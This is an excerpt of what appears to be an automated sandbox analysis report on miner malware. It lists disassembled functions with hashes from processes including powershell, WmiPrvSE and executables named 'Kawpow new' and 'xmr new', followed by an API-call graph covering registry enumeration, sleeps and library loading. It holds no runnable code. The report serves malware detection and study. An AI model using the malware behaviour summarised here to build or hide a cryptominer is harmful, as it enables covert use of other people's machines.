                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ceacd8b5138b73b32ba094193fbc7d1b28e3c89f545ed0a7e32cfa3d32bbba3a
                        • Instruction ID: d923cf3ac6ff73e0ea5899ab2911468ceb60b7bab7a567c270bd5d8e3b6de10b
                        • Opcode Fuzzy Hash: ceacd8b5138b73b32ba094193fbc7d1b28e3c89f545ed0a7e32cfa3d32bbba3a
                        • Instruction Fuzzy Hash: F2F0A7397005048FDB00EB68D940A59B7E6EFCC651B044154E90DCB325DF34DC038B90
                        Function 04F191D0 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c933d20eafb75559134c2f7dbe6e1c742f7f80c77bc5307b1e2c113fd5385ce
                        • Instruction ID: 689e56ed7fdb2bddacec1fe94a3bbf96bb96b2507e0af5f222545395436f1d42
                        • Opcode Fuzzy Hash: 8c933d20eafb75559134c2f7dbe6e1c742f7f80c77bc5307b1e2c113fd5385ce
                        • Instruction Fuzzy Hash: A1F0A0716041149BE744BFA9D4187ABB7A6DBC535AF10822AD90947384DF3E7806CBE0
                        Function 04F19240 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24191828539554cf894ba552060b93292a660000135009bdfe23e985a6368d6c
                        • Instruction ID: 8a15a0860070213695ab60b80ffa27edba81b810b13ffaf48e093dc639aea2d4
                        • Opcode Fuzzy Hash: 24191828539554cf894ba552060b93292a660000135009bdfe23e985a6368d6c
                        • Instruction Fuzzy Hash: 68F082709093944FD7619FB9D4AC39ABFF4EB42310F04546ED58EC7282DB3A6881C790
                        Function 04F1DF30 Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f15f4ea66db02f97638893182ec653ee55ca9fb1c10de5f66549860f81cdbff3
                        • Instruction ID: ccfdef0feae7aa006cda014d3abd2cb169dc690d4fcfa5d5736be0ba99866012
                        • Opcode Fuzzy Hash: f15f4ea66db02f97638893182ec653ee55ca9fb1c10de5f66549860f81cdbff3
                        • Instruction Fuzzy Hash: BFE0E5357002148F83149F1DD498D2AB7FAEFCEA2571900A9F549CB371DA61EC02CB90
                        Function 04F19629 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56b8f4ec1774e2b1545963fc01cfce42c717b0dd8753809c45cce6b33e203d9a
                        • Instruction ID: 7e49c2c20c260e7e0c318390e19878238a787f00994689416a1b60eb8a12493a
                        • Opcode Fuzzy Hash: 56b8f4ec1774e2b1545963fc01cfce42c717b0dd8753809c45cce6b33e203d9a
                        • Instruction Fuzzy Hash: 2AE068527053114797003ABA8C20A36B58ECAE25F1B01033AC928C32E0DC45EC0383F2
                        Function 04F1DD70 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c58d0b48f48471d1a46cdbc2b90f577a1339f5b12503be048d0c1fca9f75b491
                        • Instruction ID: baf544c4730b5d035de8b81b0c89f7eadfd027f9d933b5398101db7bab95b993
                        • Opcode Fuzzy Hash: c58d0b48f48471d1a46cdbc2b90f577a1339f5b12503be048d0c1fca9f75b491
                        • Instruction Fuzzy Hash: 63E0E53060A7905BC317933D981089E7FA9DEC717530845AED049CB612CA54A80A87A7
                        Function 04F1DDC1 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09e8ab3511c111976500b26beafb23fe532b2a7199cb751faac2d2027ae2621b
                        • Instruction ID: 52b1720579ca2688e91038a5309d0c0790e04976698984b42de95681ea6f7d09
                        • Opcode Fuzzy Hash: 09e8ab3511c111976500b26beafb23fe532b2a7199cb751faac2d2027ae2621b
                        • Instruction Fuzzy Hash: B0E02B3570809057CB04C27CD4444EDFF75DFC9220F04847ED90AA7241CA62680AD791
                        Function 04F1B078 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e769b21235cf88c7ed037ad8b7f2615f6ae0f47b61f13c9107533a317b4bc49
                        • Instruction ID: 889578ec2ed5345b2f4b3e1143d421ded45a8559a7a8c40e0df3597dde4da554
                        • Opcode Fuzzy Hash: 1e769b21235cf88c7ed037ad8b7f2615f6ae0f47b61f13c9107533a317b4bc49
                        • Instruction Fuzzy Hash: 3DE0201674D3D11A8B16813D68604A56F7245C723030C81FFD054CB657CC52A8474351
                        Function 04F18A52 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba508e6b5a2a7aa81b11ade3d5404c3f2a232315c17bdcddf998439b509e3e15
                        • Instruction ID: ab7ee04b02a1b6b627511b465793c205871c6cc74a5e4bc693cedaf216f72a3b
                        • Opcode Fuzzy Hash: ba508e6b5a2a7aa81b11ade3d5404c3f2a232315c17bdcddf998439b509e3e15
                        • Instruction Fuzzy Hash: 3DE0D8317086545BDB092775D41C2AEFA96EBC4726F01002EEB1A83341CF39681287D5
                        Function 04F19250 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a3a9bdb9c40218a5c3696543be4a3eb6ac6637ff59d4ae560a2df5b0370c104
                        • Instruction ID: 7ec49fa120e31afcf7871ab0d350879caca761457371d1ee5b8ebdefd9d62b21
                        • Opcode Fuzzy Hash: 2a3a9bdb9c40218a5c3696543be4a3eb6ac6637ff59d4ae560a2df5b0370c104
                        • Instruction Fuzzy Hash: D1F0ED719043049BD7649FB9D4A879ABBE5EB44355F00542DE65EC7340DB3A6881CB90
                        Function 04F18A58 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 979f9790ad04d7f54084d309cae23c2c1a72447c1d2fd74b1304e488b0bc30c1
                        • Instruction ID: eab60fd66d4968056d31d6e95819ebfce5ffcc6392dc18fe467ab29677864f06
                        • Opcode Fuzzy Hash: 979f9790ad04d7f54084d309cae23c2c1a72447c1d2fd74b1304e488b0bc30c1
                        • Instruction Fuzzy Hash: 00E0203130815457CB083775941C29EF656DBC4725F01002ED70583341CF38181143D5
                        Function 04F19638 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a19fe3e245a973c4151a468f4c7e18a106ee0a53e12656b007031491ccb6894c
                        • Instruction ID: c354ac5094f6d6889446e46633e61dcc02a0c459ed5a524b8cbbc60d3bbb459e
                        • Opcode Fuzzy Hash: a19fe3e245a973c4151a468f4c7e18a106ee0a53e12656b007031491ccb6894c
                        • Instruction Fuzzy Hash: D2D05E5270122107AA5439FA5D20ABBB1CF8AE64E5B06023A9E08D7351EC84EC0343F1
                        Function 04F1DDD0 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                        • Instruction ID: ffb392e4f3789144f91ae8ad236cc5103aa36832694683de00d61828268f3cbc
                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                        • Instruction Fuzzy Hash: 89E08632B04014A78B08D599D4504D9F7BADBCC221F04847FD90AA7350DA72791687D1
                        Function 04F1DD80 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0f9139216cfda916f49a9c1eddb34812cd0923a39870d746fd5a26fa019d228
                        • Instruction ID: 9a1dcf99747b37afc1b0da2c0e407a984b04d51d558c4ec2b93fe2d9de65d990
                        • Opcode Fuzzy Hash: b0f9139216cfda916f49a9c1eddb34812cd0923a39870d746fd5a26fa019d228
                        • Instruction Fuzzy Hash: 64E0C2317007105B971A661EA81085FB7EEDFC967A310842EE419C7300DF64FC0787EA
                        Function 04F18819 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b8e29b5b3d6601664d6b5ddc45b3a6a64be31f2202da29ad1ae043993a3809a
                        • Instruction ID: e4d84ee25c369fcddbc3cd2e5c4d71a8aa04e489b08bc2a16a83dbb8e2ae4dd1
                        • Opcode Fuzzy Hash: 8b8e29b5b3d6601664d6b5ddc45b3a6a64be31f2202da29ad1ae043993a3809a
                        • Instruction Fuzzy Hash: B5E08631919289CBCB08BFA4E86B4EDBF34EB10311B41015DD96742691EA316597CBC0
                        Function 04F188E0 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 022471e2f090188bcd9a007d3e4017c550ba5146b84c7a40efe07fd3a17387ee
                        • Instruction ID: 14e4f204123f3169fc5ef6fd5b0a893c37684da56896e5bb5c60366d60009ca1
                        • Opcode Fuzzy Hash: 022471e2f090188bcd9a007d3e4017c550ba5146b84c7a40efe07fd3a17387ee
                        • Instruction Fuzzy Hash: 31E0DF30A08289CFC708EBF8D06586AFFF5EB45200B0081ACDA4A83352D6305861EB86
                        Function 04F1F940 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77a9c2d9a9fdfa60182ca027e63ca379850bf7f9ea686fa02a137dcdcec2f6b8
                        • Instruction ID: cd4fc397a40e5385cc40a6091afad12e3cba7441f47faed4ec79f63e50d15012
                        • Opcode Fuzzy Hash: 77a9c2d9a9fdfa60182ca027e63ca379850bf7f9ea686fa02a137dcdcec2f6b8
                        • Instruction Fuzzy Hash: A5E04F70E482469FCB80EF7D88815A9FFF0EB59200F6085AEC959D7311E3324612CF91
                        Function 04F1F950 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction ID: cfc0a06edbf1e710f10f9f6adfca2e205e5f92a5b6240534dff92d075ae557dd
                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction Fuzzy Hash: ECD067B1D04209AF8780EFADC94156EFBF4EB49204F6085AA8919E7311F7329A128FD1
                        Function 04F17F71 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 885154debbfea59a09b8901c2d8c96f3cbfc00cf229541abe6b02a71af91d9ea
                        • Instruction ID: eb768d321e6a5e7a7590b3ce6040a08690a1482c5303367599b84eb81950771c
                        • Opcode Fuzzy Hash: 885154debbfea59a09b8901c2d8c96f3cbfc00cf229541abe6b02a71af91d9ea
                        • Instruction Fuzzy Hash: F3C04C2090A3D05BFF535B354DC57417FF2AD4351D70D77D58186CA417C4B8884AC712
                        Function 04F188F0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4863a45ff60e4e3c5405d4b56a9e7a6a5be2a16511ee40286d31ebeae04199da
                        • Instruction ID: 180be7069443dbfaad8d6bcf5592e5d188dda8144c19d18ebc4bec5c774daac4
                        • Opcode Fuzzy Hash: 4863a45ff60e4e3c5405d4b56a9e7a6a5be2a16511ee40286d31ebeae04199da
                        • Instruction Fuzzy Hash: 16D01730A0824A8B8B08EFA8E46686EFBF9EB44201F004169DA0993390EA306851CBC1
                        Function 04F18828 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 029b4988cc19aaa470bc6f78690438911cd431df27331d678bb00ce9e354b5f5
                        • Instruction ID: 2277777b30fd85439e88f7ab56fda9fac84b474fcea74f5d78bc054f0ec8cf3d
                        • Opcode Fuzzy Hash: 029b4988cc19aaa470bc6f78690438911cd431df27331d678bb00ce9e354b5f5
                        • Instruction Fuzzy Hash: EED067319151498BCB08ABA4E86B4BEBB38FB14301F41516DD91752291EA316A6ACEC1
                        Function 04F17A00 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a5ead9b8f9a755d73fb5fbf7bf85fd2ef2e0a15f42746e9c4541691a1143608
                        • Instruction ID: ff467c62f06ff6be4e39a76c3b944f32cf07d1203b68ba850c60ad6ca546aa47
                        • Opcode Fuzzy Hash: 2a5ead9b8f9a755d73fb5fbf7bf85fd2ef2e0a15f42746e9c4541691a1143608
                        • Instruction Fuzzy Hash: BFC080340463849BC716CFBDD4444587F117E0212530414DDDD4B4E557C9B38082CF00
                        Function 04F17A08 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61128178bb9076bed75fe67deb54a9cc898e92c2d4937626049e8e41c4524945
                        • Instruction ID: 11e378f3a8d903f2ff5f3c84d95ac11c0d34cbc258c5a88eb0fdcd624aaa9d06
                        • Opcode Fuzzy Hash: 61128178bb9076bed75fe67deb54a9cc898e92c2d4937626049e8e41c4524945
                        • Instruction Fuzzy Hash: 31B09230044709CFC2096FB6A408824B729BA4021A78008A9EA1E4A6A79E37E892CA44

                        Non-executed Functions

                        Function 08BC3A98 Relevance: .4, Instructions: 373COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c29e3eecd5ffdd96fd1f3af00d6aa8ce68c360f51a9eea29d42571ae1a99ec7
                        • Instruction ID: 9b5a455f45561a79e55a1ab1d37c923215b18e1205dd25d7ed1a1400635bdb61
                        • Opcode Fuzzy Hash: 7c29e3eecd5ffdd96fd1f3af00d6aa8ce68c360f51a9eea29d42571ae1a99ec7
                        • Instruction Fuzzy Hash: FEE13C707002059FEB14DF65C944BAABBF1EF48706F508A6DE406DF3A1EB71E9468B50

                        Executed Functions

                        Function 00007FF7DD371140 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.1529880200.00007FF7DD371000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7DD370000, based on PE: true
                        • Associated: 00000004.00000002.1529854751.00007FF7DD370000.00000002.00000001.01000000.00000005.sdmpDownload File
                        • Associated: 00000004.00000002.1529911108.00007FF7DD37C000.00000002.00000001.01000000.00000005.sdmpDownload File
                        • Associated: 00000004.00000002.1529982066.00007FF7DD37F000.00000004.00000001.01000000.00000005.sdmpDownload File
                        • Associated: 00000004.00000002.1530015124.00007FF7DD380000.00000008.00000001.01000000.00000005.sdmpDownload File
                        • Associated: 00000004.00000002.1530585722.00007FF7DD874000.00000004.00000001.01000000.00000005.sdmpDownload File
                        • Associated: 00000004.00000002.1530636118.00007FF7DD8AC000.00000002.00000001.01000000.00000005.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff7dd370000_Kawpow new.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: aac7237fd1035bbd72c7f6fb7561da56bed2c840ac126ba4fe2fccbf45e5e563
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: 76B09231918A09E4E2003B05D84135CA3606B0A740FC01026C44C06352DE6D90408B60

                        Executed Functions

                        Function 00007FF7A4DB1140 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.1531994469.00007FF7A4DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7A4DB0000, based on PE: true
                        • Associated: 00000006.00000002.1531952757.00007FF7A4DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.1532071654.00007FF7A4DBC000.00000002.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.1532097179.00007FF7A4DBF000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.1532126079.00007FF7A4DC0000.00000008.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.1533399019.00007FF7A52B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                        • Associated: 00000006.00000002.1533491662.00007FF7A52EC000.00000002.00000001.01000000.00000008.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_7ff7a4db0000_xmr new.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: f4e2e404eed0e19b5b02dcd3776bd5943a404d773808140b05a0aeb1e0ae5e84
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: DBB09230A0660994E2003F02988135C62A06B08B81F820034C61C06372CA6E50424B20

                        Execution Graph

                        Execution Coverage:0.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:1.2%
                        Total number of Nodes:81
                        Total number of Limit Nodes:2
                        execution_graph 14906 2534cf91abc 14912 2534cf91628 GetProcessHeap 14906->14912 14908 2534cf91ad2 Sleep SleepEx 14910 2534cf91acb 14908->14910 14910->14908 14911 2534cf91598 StrCmpIW StrCmpW 14910->14911 14957 2534cf918b4 14910->14957 14911->14910 14913 2534cf91648 _invalid_parameter_noinfo 14912->14913 14974 2534cf91268 GetProcessHeap 14913->14974 14915 2534cf91650 14916 2534cf91268 2 API calls 14915->14916 14917 2534cf91661 14916->14917 14918 2534cf91268 2 API calls 14917->14918 14919 2534cf9166a 14918->14919 14920 2534cf91268 2 API calls 14919->14920 14921 2534cf91673 14920->14921 14922 2534cf9168e RegOpenKeyExW 14921->14922 14923 2534cf916c0 RegOpenKeyExW 14922->14923 14924 2534cf918a6 14922->14924 14925 2534cf916ff RegOpenKeyExW 14923->14925 14926 2534cf916e9 14923->14926 14924->14910 14928 2534cf91723 14925->14928 14929 2534cf9173a RegOpenKeyExW 14925->14929 14978 2534cf912bc RegQueryInfoKeyW 14926->14978 14989 2534cf9104c RegQueryInfoKeyW 14928->14989 14932 2534cf9175e 14929->14932 14933 2534cf91775 RegOpenKeyExW 14929->14933 14930 2534cf916f5 RegCloseKey 14930->14925 14934 2534cf912bc 11 API calls 14932->14934 14935 2534cf917b0 RegOpenKeyExW 14933->14935 14936 2534cf91799 14933->14936 14938 2534cf9176b RegCloseKey 14934->14938 14940 2534cf917eb RegOpenKeyExW 14935->14940 14941 2534cf917d4 14935->14941 14939 2534cf912bc 11 API calls 14936->14939 14938->14933 14942 2534cf917a6 RegCloseKey 14939->14942 14944 2534cf9180f 14940->14944 14945 2534cf91826 RegOpenKeyExW 14940->14945 14943 2534cf912bc 11 API calls 14941->14943 14942->14935 14946 2534cf917e1 RegCloseKey 14943->14946 14947 2534cf9104c 4 API calls 14944->14947 14948 2534cf91861 RegOpenKeyExW 14945->14948 14949 2534cf9184a 14945->14949 14946->14940 14953 2534cf9181c RegCloseKey 14947->14953 14951 2534cf9189c RegCloseKey 14948->14951 14952 2534cf91885 14948->14952 14950 2534cf9104c 4 API calls 14949->14950 14954 2534cf91857 RegCloseKey 14950->14954 14951->14924 14955 2534cf9104c 4 API calls 14952->14955 14953->14945 14954->14948 14956 2534cf91892 RegCloseKey 14955->14956 14956->14951 15002 2534cf914a4 14957->15002 14995 2534cfa6168 14974->14995 14977 2534cf912ae _invalid_parameter_noinfo 14977->14915 14979 2534cf91327 GetProcessHeap 14978->14979 14980 2534cf9148a __free_lconv_mon 14978->14980 14983 2534cf9133e _invalid_parameter_noinfo __free_lconv_mon 14979->14983 14980->14930 14981 2534cf91352 RegEnumValueW 14981->14983 14982 2534cf91476 GetProcessHeap 14982->14980 14983->14981 14983->14982 14985 2534cf9141e lstrlenW GetProcessHeap 14983->14985 14986 2534cf913d3 GetProcessHeap 14983->14986 14987 2534cf91443 StrCpyW 14983->14987 14988 2534cf913f3 GetProcessHeap 14983->14988 14997 2534cf9152c 14983->14997 14985->14983 14986->14983 14987->14983 14988->14983 14990 2534cf911b5 RegCloseKey 14989->14990 14993 2534cf910bf _invalid_parameter_noinfo __free_lconv_mon 14989->14993 14990->14929 14991 2534cf910cf RegEnumValueW 14991->14993 14992 2534cf9114e GetProcessHeap 14992->14993 14993->14990 14993->14991 14993->14992 14994 2534cf9116e GetProcessHeap 14993->14994 14994->14993 14996 2534cf91283 GetProcessHeap 14995->14996 14996->14977 14998 2534cf9157c 14997->14998 14999 2534cf91546 14997->14999 14998->14983 14999->14998 15000 2534cf9155d StrCmpIW 14999->15000 15001 2534cf91565 StrCmpW 14999->15001 15000->14999 15001->14999 15003 2534cf914e1 GetProcessHeap 15002->15003 15004 2534cf914c1 GetProcessHeap 15002->15004 15008 2534cfa6180 15003->15008 15005 2534cf914da __free_lconv_mon 15004->15005 15005->15003 15005->15004 15009 2534cf914f6 GetProcessHeap HeapFree 15008->15009 15010 2534cf6273c 15012 2534cf6276a 15010->15012 15011 2534cf628d4 15012->15011 15013 2534cf62858 LoadLibraryA 15012->15013 15013->15012

                        Executed Functions

                        Function 000002534CF9328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 946a088c5119399108370361b0ae6af5c38f836bde2a24ab80e596d054a11037
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 7711AD71614E0982FF60DB61FC0DB69A294A7447C7F6071249A06815B0EF7CC34C8B38
                        Function 000002534CF91ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 000002534CF91628: GetProcessHeap.KERNEL32 ref: 000002534CF91633
                          • Part of subcall function 000002534CF91628: HeapAlloc.KERNEL32 ref: 000002534CF91642
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF916B2
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF916DF
